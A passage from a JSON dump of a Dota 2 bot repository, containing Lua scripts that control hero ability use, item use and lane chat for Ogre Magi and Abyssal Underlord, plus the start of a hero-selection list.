= npcBot:GetItemInSlot(pipeSlot)\n end\n if pipe ~= nil then\n if pipe:IsFullyCastable() then\n npcBot:Action_UseAbility(pipe)\n end\n end\n end\n\n -- Shiva's Guard --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local shivaSlot = npcBot:FindItemSlot(\"item_shivas_guard\")\n local shiva = nil\n if npcBot:GetItemSlotType(shivaSlot) == ITEM_SLOT_TYPE_MAIN then\n shiva = npcBot:GetItemInSlot(shivaSlot)\n end\n if shiva ~= nil then\n if shiva:IsFullyCastable() then\n npcBot:Action_UseAbility(shiva)\n end\n end\n end\n\n -- magic wand --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n local wand = nil\n if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n wand = npcBot:GetItemInSlot(wandSlot)\n end\n if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHealth < 100 or botMana < 100) then\n if wand:IsFullyCastable() then\n npcBot:Action_UseAbility(wand)\n end\n end\n end\n\n -- Medallion of Courage --\n if npcBot:GetAttackTarget() ~= nil then\n local medallionSlot = npcBot:FindItemSlot(\"item_medallion_of_courage\")\n local medallion = nil\n if npcBot:GetItemSlotType(medallionSlot) == ITEM_SLOT_TYPE_MAIN then\n medallion = npcBot:GetItemInSlot(medallionSlot)\n end\n if medallion ~= nil then\n if medallion:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(medallion, npcBot:GetAttackTarget())\n end\n end\n end\n\n -- Solar Crest --\n if npcBot:GetAttackTarget() ~= nil then\n local solarCrestSlot = npcBot:FindItemSlot(\"item_solar_crest\")\n local solarCrest = nil\n if npcBot:GetItemSlotType(solarCrestSlot) == ITEM_SLOT_TYPE_MAIN then\n solarCrest = npcBot:GetItemInSlot(solarCrestSlot)\n end\n if solarCrest ~= nil then\n if solarCrest:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(solarCrest, npcBot:GetAttackTarget())\n end\n end\n end\n\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.690130889415741,
"alphanum_fraction": 0.7005659937858582,
"avg_line_length": 38.67719268798828,
"blob_id": "01a6e4de64b80d0f30353c21c5b3acecc8f42559",
"content_id": "d16d7c1b46e1d4b463836053cb158b34ca4a1d5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11308,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 285,
"path": "/ability_item_usage_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_ogre_magi\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal fireblast = npcBot:GetAbilityByName(\"ogre_magi_fireblast\")\nlocal ignite = npcBot:GetAbilityByName(\"ogre_magi_ignite\")\nlocal bloodlust = npcBot:GetAbilityByName(\"ogre_magi_bloodlust\")\nlocal form = npcBot:GetAbilityByName(\"ogre_magi_unrefined_fireblast\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\n\t-- Nearby Units\n\tlocal allies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal enemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\tlocal enemyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n\tlocal allyCreeps = npcBot:GetNearbyLaneCreeps(1000, false)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\t\n\tlocal numAllies = table.getn(allies)\n\tlocal numEnemies = table.getn(enemies)\n\tlocal numEnemyCreeps = table.getn(enemyCreeps)\n\tlocal numAllyCreeps = table.getn(allyCreeps)\n\tlocal numNeutrals = table.getn(neutrals)\n\t\n\t-- Use BLOODLUST\n\tif bloodlust:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif numAllies > 0 then\n\t\t\tfor a = 1, numAllies do\n\t\t\t\tlocal ally = allies[a]\n\t\t\t\t\n\t\t\t\tif not ally:HasModifier(\"modifier_ogre_magi_bloodlust\") then\n\t\t\t\t\tlocal allyTarget = ally:GetAttackTArget()\n\t\t\t\t\t\n\t\t\t\t\tif allyTarget ~= nil and allyTarget:IsHero() then\n\t\t\t\t\t\tnpcBot:Action_UseAbilityOnEntity(bloodlust, ally)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telseif mode == BOT_MODE_ATTACK then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(bloodlust, npcBot)\n\t\tend\n\tend\n\t\n\t-- Use FIREBLAST\n\tif fireblast:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tlocal enemyDist = GetUnitToUnitDistance(npcBot, enemies[1])\n\t\t\n\t\tif mode == BOT_MODE_ATTACK then\n \t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemies[1])\n\t\telseif enemies[1]:GetAttackTarget() == npcBot then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemies[1])\n\t\tend\n\telseif fireblast:IsFullyCastable() and numEnemyCreeps > 3 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tfor c = 1, numEnemyCreeps do\n\t\t\tlocal enemy = enemyCreeps[c]\n\t\t\t\n\t\t\tif enemy:GetHealth() / enemy:GetMaxHealth() == 1 then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(fireblast, enemy)\n\t\t\tend \n\t\tend\n\tend\n\t\n\t-- Use IGNITE\n\tif ignite:IsFullyCastable() and numEnemies > 0 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tnpcBot:Action_UseAbilityOnEntity(ignite, enemies[1])\n\telseif ignite:IsFullyCastable() and numEnemyCreeps > 3 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tfor c = 1, numEnemyCreeps do\n\t\t\tlocal enemy = enemyCreeps[c]\n\t\t\t\n\t\t\tif enemy:GetHealth() / enemy:GetMaxHealth() == 1 then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(ignite, enemy)\n\t\t\tend \n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal allies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\t-- USABLE ITEMS --------------------------------------------------------------------------------\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\tlocal midas = nil\n\tlocal wand = nil\n\tlocal glimmer = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal midasLoc = npcBot:FindItemSlot(\"item_hand_of_midas\")\n\tlocal wandLoc = npcBot:FindItemSlot(\"item_magic_wand\")\n\tlocal glimmerLoc = npcBot:FindItemSlot(\"item_glimmer_cape\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\tif npcBot:GetItemSlotType(midasLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tmidas = npcBot:GetItemInSlot(midasLoc)\n\tend\n\tif npcBot:GetItemSlotType(wandLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\twand = npcBot:GetItemInSlot(wandLoc)\n\tend\n\tif npcBot:GetItemSlotType(glimmerLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tglimmer = npcBot:GetItemInSlot(glimmerLoc)\n\tend\n\t------------------------------------------------------------------------------------------------\n\n\t-- BOUNTY RUNE PICKUP --------------------------------------------------------------------------\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- HAND OF MIDAS Usage -------------------------------------------------------------------------\n\tif midas ~= nil then\n\t\tlocal midasTarget = _G.getMidasTarget(npcBot)\n\t\t\n\t\tif midas:IsCooldownReady() and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(midas, midasTarget)\n\t\tend\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- GLIMMER CAPE Usage --------------------------------------------------------------------------\n\tif glimmer ~= nil then\n\t\tif table.getn(enemies) > 0 and table.getn(allies) > 0 then\n\t\t\tlocal allyToEnemyDist = GetUnitToUnitDistance(enemies[1], allies[1])\n\t\t\t\n\t\t\tif allyToEnemyDist < 1000 and botAction ~= BOT_ACTION_TYPE_USE_ABILITY and glimmer:IsFUllyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(glimmer, allies[1])\n\t\t\tend\n\t\telseif table.getn(enemies) > 0 and table.getn(allies) == 0 then\n\t\t\tlocal botToEnemyDist = GetUnitToUnitDistance(npcBot, enemies[1])\n\t\t\t\n\t\t\tif botToEnemyDist < 500 and botAction ~= BOT_ACTION_TYPE_USE_ABILITY and glimmer:IsFUllyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnEntity(glimmer, allies[1])\n\t\t\tend\n\t\tend\n\tend\n\t------------------------------------------------------------------------------------------------\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\t\n\tif cyclone ~= nil and cyclone:IsCooldownReady() and currentMode == BOT_MODE_RETREAT then\n\t\tif table.getn(enemies) > 0 then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemies[1])\n\t\tend\n\tend\n\t\n\t-- Mana Regen\n\tif botMana / botMaxMana < 0.5 and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n -- HP Regen\n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() and botAction ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif wand ~= nil and wand:GetCurrentCharges() > 3 then\n\t\t\tnpcBot:Action_UseAbility(wand)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use Courier\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.5678815245628357,
"alphanum_fraction": 0.575419008731842,
"avg_line_length": 39.71480178833008,
"blob_id": "dcde14047e2a25ce4bcb289799bc2165e6973e35",
"content_id": "9abd01ff38656164f6f183fae0620f01d1b6ef4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 11277,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 277,
"path": "/ability_item_usage_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_abyssal_underlord\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\nlocal UnderDarkRift = false\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n print(npcBot:GetAbilityPoints(), skillsToLevel[1])\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local botMaxMana = npcBot:GetMaxMana()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local firestorm = npcBot:GetAbilityByName(\"abyssal_underlord_firestorm\")\n local pit_of_malice = npcBot:GetAbilityByName(\"abyssal_underlord_pit_of_malice\")\n local atrophy_aura = npcBot:GetAbilityByName(\"abyssal_underlord_atrophy_aura\")\n local dark_rift = npcBot:GetAbilityByName(\"abyssal_underlord_dark_rift\")\n local cancel_dark_rift = npcBot:GetAbilityByName(\"abyssal_underlord_cancel_dark_rift\")\n\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\n if dark_rift:GetCooldownTimeRemaining() ~= 0 then\n UnderDarkRift = false\n end\n\n -- Fire storm think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= BOT_ACTION_TYPE_MOVE_TO then\n if not npcBot:IsChanneling() then\n fire_power_count = 0\n if #nearbyEnemies > 0 then\n for j, enemy in pairs(nearbyEnemies) do\n fire_power_count = fire_power_count + 2\n end\n end\n if #nearbyCreeps > 0 then\n for j, creep in pairs(nearbyCreeps) do\n fire_power_count = fire_power_count + 1\n end\n end\n if fire_power_count >= 4 then\n if firestorm:GetCooldownTimeRemaining() == 0 then\n local soulRingSlot = npcBot:FindItemSlot(\"item_soul_ring\")\n local soulRing = nil\n if npcBot:GetItemSlotType(soulRingSlot) == ITEM_SLOT_TYPE_MAIN then\n soulRing = npcBot:GetItemInSlot(soulRingSlot)\n end\n if soulRing ~= nil then\n if soulRing:IsFullyCastable() and botMana < 300 and botHealth > 400 then\n npcBot:Action_UseAbility(soulRing)\n end\n end\n -- calculate the location --\n local x_avg = 0\n local y_avg = 0\n if #nearbyCreeps > 0 then\n for i, creep in ipairs(nearbyCreeps) do\n x_avg = x_avg + creep:GetLocation()[1]\n y_avg = y_avg + creep:GetLocation()[2]\n end\n end\n if #nearbyEnemies > 0 then\n for i, hero in ipairs(nearbyEnemies) do\n x_avg = x_avg + hero:GetLocation()[1]\n y_avg = y_avg + hero:GetLocation()[2]\n end\n end\n size = #nearbyCreeps + #nearbyEnemies\n fire_location = Vector(x_avg/size, y_avg/size, 0)\n\n -- print(\"Ability : Using Fire Storm at \", fire_location)\n if firestorm:IsFullyCastable() then\n npcBot:Action_UseAbilityOnLocation(firestorm, fire_location)\n end\n end\n end\n end\n end\n\n -- pit of malice think --\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= action ~= BOT_ACTION_TYPE_MOVE_TO then\n if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_DEFEND_ALLY or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if not npcBot:IsChanneling() then\n pit_power_count = 0\n if #nearbyEnemies > 0 then\n for i, hero in ipairs(nearbyEnemies) do\n pit_power_count = pit_power_count + 2\n end\n end\n if pit_power_count >= 2 then\n if pit_of_malice:IsFullyCastable() then\n local soulRingSlot = npcBot:FindItemSlot(\"item_soul_ring\")\n local soulRing = nil\n if npcBot:GetItemSlotType(soulRingSlot) == ITEM_SLOT_TYPE_MAIN then\n soulRing = npcBot:GetItemInSlot(soulRingSlot)\n end\n if soulRing ~= nil then\n if soulRing:IsFullyCastable() and botMana < 300 and botHealth > 400 then\n npcBot:Action_UseAbility(soulRing)\n end\n end\n aoeLocations = npcBot:FindAoELocation(true, true, npcBot:GetLocation(), 900, 375, 1.0, 0)\n -- print(aoeLocations.count)\n pit_of_maliceLoc = aoeLocations.targetloc\n npcBot:Action_UseAbilityOnLocation(pit_of_malice, pit_of_maliceLoc)\n end\n end\n end\n end\n end\n\n -- dark rift think --\n if action_mode == BOT_MODE_RETREAT or action_mode == BOT_MODE_EVASIVE_MANEUVERS then\n if #nearbyEnemies >= 1 then\n if dark_rift:IsFullyCastable() and not UnderDarkRift then\n print(\"Using Dark Rift\")\n npcBot:ActionImmediate_Chat(\"I'm Casting Dark Rift back to Base! Come to me!!\", false)\n npcBot:Action_UseAbilityOnLocation(dark_rift, GetAncient(botTeam):GetLocation())\n UnderDarkRift = true\n end\n end\n end\n\n -- Hood of Defiance --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local hoodSlot = npcBot:FindItemSlot(\"item_hood_of_defiance\")\n local hood = nil\n if npcBot:GetItemSlotType(hoodSlot) == ITEM_SLOT_TYPE_MAIN then\n hood = npcBot:GetItemInSlot(hoodSlot)\n end\n if hood ~= nil then\n if hood:IsFullyCastable() then\n npcBot:Action_UseAbility(hood)\n end\n end\n end\n\n -- Pipe of Insight --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local pipeSlot = npcBot:FindItemSlot(\"item_pipe\")\n local pipe = nil\n if npcBot:GetItemSlotType(pipeSlot) == ITEM_SLOT_TYPE_MAIN then\n pipe = npcBot:GetItemInSlot(pipeSlot)\n end\n if pipe ~= nil then\n if pipe:IsFullyCastable() then\n npcBot:Action_UseAbility(pipe)\n end\n end\n end\n\n -- Crimson Guard --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local crimsonSlot = npcBot:FindItemSlot(\"item_crimson_guard\")\n local crimson = nil\n if npcBot:GetItemSlotType(crimsonSlot) == ITEM_SLOT_TYPE_MAIN then\n crimson = npcBot:GetItemInSlot(crimsonSlot)\n end\n if crimson ~= nil then\n if crimson:IsFullyCastable() then\n npcBot:Action_UseAbility(crimson)\n end\n end\n end\n\n -- Guardian Greaves --\n local guardianGreavesSlot = npcBot:FindItemSlot(\"item_guardian_greaves\")\n local guardianGreaves = nil\n if npcBot:GetItemSlotType(guardianGreavesSlot) == ITEM_SLOT_TYPE_MAIN then\n guardianGreaves = npcBot:GetItemInSlot(guardianGreavesSlot)\n end\n local use_guardian = false\n if npcBot:HasModifier(\"modifier_silence\") or npcBot:HasModifier(\"modifier_silencer_global_silence\") then\n use_guardian = true\n else\n if botMana/botMaxMana < 0.5 or botHealth/botMaxHealth < 0.75 then\n use_guardian = true\n else\n nearbyAllies = npcBot:GetNearbyHeroes(900, false, BOT_MODE_NONE)\n for j, ally in pairs(nearbyAllies) do\n allyHealth = ally:GetHealth()\n allyMaxHealth = ally:GetMaxHealth()\n allyMana = ally:GetMana()\n allyMaxMana = ally:GetMaxMana()\n if allyHealth/allyMaxHealth < 0.5 or allyMana/allyMaxMana<0.5 then\n use_guardian = true\n break\n end\n end\n end\n end\n if guardianGreaves ~= nil and use_guardian then\n if guardianGreaves:IsFullyCastable() then\n npcBot:Action_UseAbility(guardianGreaves)\n end\n end\n\n -- Shiva's Guard --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_DEFEND_ALLY\n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local shivaSlot = npcBot:FindItemSlot(\"item_shivas_guard\")\n local shiva = nil\n if npcBot:GetItemSlotType(shivaSlot) == ITEM_SLOT_TYPE_MAIN then\n shiva = npcBot:GetItemInSlot(shivaSlot)\n end\n if shiva ~= nil then\n if shiva:IsFullyCastable() then\n npcBot:Action_UseAbility(shiva)\n end\n end\n end\n\n -- magic wand --\n if (action_mode == BOT_MODE_ATTACK \n or action_mode == BOT_MODE_RETREAT \n or action_mode == BOT_MODE_EVASIVE_MANEUVERS) then\n local wandSlot = npcBot:FindItemSlot(\"item_magic_wand\")\n local wand = nil\n if npcBot:GetItemSlotType(wandSlot) == ITEM_SLOT_TYPE_MAIN then\n wand = npcBot:GetItemInSlot(wandSlot)\n end\n if wand ~= nil and (wand:GetCurrentCharges() > 10 or botHealth < 100 or botMana < 100) then\n if wand:IsFullyCastable() then\n npcBot:Action_UseAbility(wand)\n end\n end\n end\nend\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.6747816801071167,
"alphanum_fraction": 0.6831285357475281,
"avg_line_length": 23.007421493530273,
"blob_id": "e194e92de806a9737a3eacd38d54c40cb8218c6c",
"content_id": "5cf502f3283f25dfd441aafdd8112f06e7c9e180",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 12939,
"license_type": "no_license",
"max_line_length": 215,
"num_lines": 539,
"path": "/hero_selection.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local pickTime=GameTime();\nlocal randomTime=0;\n\ncarry_heroes = {\n\t\"npc_dota_hero_antimage\",\n\t\"npc_dota_hero_drow_ranger\",\n\t\"npc_dota_hero_juggernaut\",\n\t\"npc_dota_hero_morphling\",\n\t\"npc_dota_hero_phantom_lancer\",\n\t\"npc_dota_hero_sven\",\n\t\"npc_dota_hero_skeleton_king\",\n\t\"npc_dota_hero_luna\",\n\t\"npc_dota_hero_life_stealer\",\n\t\"npc_dota_hero_clinkz\",\n\t\"npc_dota_hero_weaver\",\n\t\"npc_dota_hero_spectre\",\n\t\"npc_dota_hero_ursa\",\n\t\"npc_dota_hero_gyrocopter\",\n\t\"npc_dota_hero_lycan\",\n\t\"npc_dota_hero_lone_druid\",\n\t\"npc_dota_hero_chaos_knight\",\n\t\"npc_dota_hero_naga_siren\",\n\t\"npc_dota_hero_slark\",\n\t\"npc_dota_hero_troll_warlord\",\n\t\"npc_dota_hero_terrorblade\",\n\t\"npc_dota_hero_arc_warden\",\n\t\"npc_dota_hero_monkey_king\",\n}\nmid_heroes = 